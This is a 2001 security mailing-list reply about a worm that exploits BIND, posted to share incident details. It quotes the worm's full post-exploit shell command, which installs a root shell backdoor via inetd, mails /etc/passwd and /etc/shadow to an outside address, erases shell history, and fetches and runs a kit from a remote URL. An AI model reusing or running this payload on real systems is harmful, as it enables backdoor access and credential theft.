Security Incidents mailing list archives
Re: BIND worm.
From: Andreas Östling <andreaso () it su se>
Date: Fri, 23 Mar 2001 09:32:25 +0100
On Thursday 22 March 2001 12:19, Scott A. McIntyre wrote:
I'm wondering how many others have seen sign of what appears to be a BIND based worm attack that's been passing through here lately.
I've seen it. After the actual BIND exploit, here is what it sends (to port 53/TCP): PATH='/usr/bin:/bin:/usr/local/bin/:/usr/sbin/:/sbin';export PAT H;export TERM=vt100;rm -rf /dev/.lib;mkdir /dev/.lib;cd /dev/.li b;echo '1008 stream tcp nowait root /bin/sh sh' >>/etc/inetd.con f;killall -HUP inetd;ifconfig -a>1i0n;cat /etc/passwd >>1i0n;cat /etc/shadow >>1i0n;mail 1i0nip () china com <1i0n;rm -fr 1i0n;rm - fr /.bash_history;lynx -dump http://coollion.51.net/crew.tgz >1i 0n.tgz;tar -zxvf 1i0n.tgz;rm -fr 1i0n.tgz;cd lib;./1i0n.sh;exit You can grab the kit from the URL above if you want to analyse it further. I have a local copy of it if it isn't available there anymore. Regards, Andreas Östling
Current thread:
- BIND worm. Scott A. McIntyre (Mar 22)
- Re: BIND worm. Neil Davey (Mar 23)
- Re: BIND worm. Andreas Östling (Mar 23)
- Re: BIND worm. Carl A. Adams (Mar 23)
- <Possible follow-ups>
- Re: BIND worm. Booth, David CWT-MSP (Mar 23)